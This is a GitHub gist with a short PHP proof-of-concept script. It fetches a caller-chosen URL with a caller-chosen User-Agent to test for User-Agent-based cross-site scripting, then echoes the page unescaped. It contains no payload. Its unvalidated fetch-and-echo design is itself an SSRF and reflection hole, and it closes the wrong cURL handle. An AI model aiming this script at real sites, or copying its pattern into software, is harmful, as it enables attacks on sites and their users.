Created
March 3, 2013 02:13
-
-
Save wcypierre/5074164 to your computer and use it in GitHub Desktop.
User Agent XSS for PoC Script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(!function_exists('curl_init')) | |
| { | |
| die("cURL is not installed or not enabled. Please install it and/or enable it"); | |
| } | |
| /* To show any errors that may exist when you edit the code, can be set to 0 when it is in production mode */ | |
| error_reporting(-1); | |
| function ua_xss($url, $useragent) | |
| { | |
| // Initiate the connection | |
| $init = curl_init(); | |
| // setting the parameters | |
| curl_setopt($init, CURLOPT_URL, $url); | |
| curl_setopt($init, CURLOPT_USERAGENT, $useragent); | |
| curl_setopt($init, CURLOPT_RETURNTRANSFER, true); | |
| // Fetching the page with the intended parameters | |
| $result = curl_exec($init); | |
| // Close the connection | |
| curl_close($result); | |
| // Return the result | |
| return $result; | |
| } | |
| $url = $_REQUEST['url']; // Request is used as the parameters can be set in Cookie, Get or Post parameter | |
| $useragent = $_REQUEST['useragent']; | |
| echo ua_xss($url, $useragent); // calling of the function and echoing the webpage of the url | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment